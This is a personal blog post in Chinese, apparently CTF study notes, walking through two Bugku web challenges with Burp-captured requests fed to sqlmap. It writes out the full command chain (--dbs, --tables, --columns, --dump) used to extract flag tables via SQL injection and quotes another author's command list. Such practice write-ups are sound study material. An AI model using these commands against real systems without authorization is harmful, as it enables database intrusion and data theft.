[bugku]sqlmap部分
例题目录
[根据校赛的经验来看的话 这种登录的可以先用sqlmap搞一下....]
然后做一个新的web题目 可以先给自己预留5min看会不会解, 不要上来就翻答案n
就5min, 可以两个题,先做题,再补题。
其他的,在哪里学习可以换地方,早点起吧,不要让思维僵化了
例题1:这是一个神奇的登录框
sqlmap要结合burp一起使用;
首先啊是抓包,然后保存下来到txt里(直接burp抓了右键copy to file 就好了)
然后开始使用sqlmap(直接在我桌面上就有那个文件)
sqlmap.py -r "D:\1.txt" -p admin_name --dbs
解释一下 -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了admin_name是注入点) --dbs意思是想获取数据库名字
(admin_name 是在源代码里面找到的..)
(我那个是bat文件 所以要加一个"python")
多试验一下吧,一路选择“Y”,开始并不行,最后好像还是可了:
我们来重复一下那个命令: python sqlmap.py -r "......\05.txt" -p admin_name --dbs
然后继续包bugkusql1这个表
sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables
解释:-D是表示选择了后面的这个数据库 --tables是想获取表
还记得吗 -p 是参数的意思
很快找到两个表
继续 sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
解释类似上面 不过加了一个-T 指定表 (在表里面继续找adin_name)
这样的话哇 哇
flag1这个列 最后查字段 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
解释:同上面 --dump是获取字段的命令
【关系】数据库--dbs(-D) 到 表名 --tables (-T) 到列名 --columns (-C) 最后--dump
然后命令的话直接回车
哇 然后就对了...... 还是很神奇的
例题2: 成绩单
……? 以前写过? 还写了博客?完全不记得了.....
再重新来一遍吧....
好 于是一样的话: python sqlmap.py -r "C:\Users\mol74\Desktop\hacku\1022.txt" -p id --dbs( 因为在源代码里那个是id )
找到了那个什么
这个是数据库 继续-d
[(改这俩地方就好啦)【修改的时候 -D (数据库名字) 后面是 --tables】(真的1 后面就是表了 然后列... )
注意缩进 python里面用的就是严格的缩进 然后就是这里起码你空格要搞对 才能区分开鸭 )
妈也 感觉是一样的套路....
然后后面大部分选择yes吧.... (这比javaweb要简单吧 我tm)....
后面好像有点慢.... 然后 wtm no found
后面似乎就不行了....哇 然后发现是因为我zz 表名字写错了
不然怎么可能找不到呢?前面表示在这个表里面 再找直接就好了哇
最后直接dump 到手 哇嘎嘎嘎嘎嘎嘎嘎!
有两个表啊 自己判断在哪里
====别人的:
2.依次执行如下命令,得到最终的结果:
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt //判断是否存在SQL注入漏洞
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt --current-db //查询当前数据库
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt -D skctf --tables //查询**数据库有哪些数据表
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt -D skctf -T fl4g --columns //查询**数据库**数据表有哪些列
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt -D skctf -T fl4g C skctf_flag --dump //查询**数据库**数据表**列的内容
---------------------
这里写错了... 那个是skctf_flag
原文:https://blog.csdn.net/johnlxj/article/details/82153355
https://blog.csdn.net/qq_40424939/article/details/80775500?utm_source=blogxgwz2
这里整理的很好.. 我也不想学了 好累
----------题外话
我觉得acm当时对我来说真的很痛苦的吧
划水的时间太长 错一点小地方 然后总是那个想修修补补 而不是重新开始的心态 什么都写的很慢
我也最多在题意和xx上蹦跶了 当个散户的话锻炼脑子 没事的时候鼓捣一下也挺好 w
就这样吧 不放弃 还能干吗
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步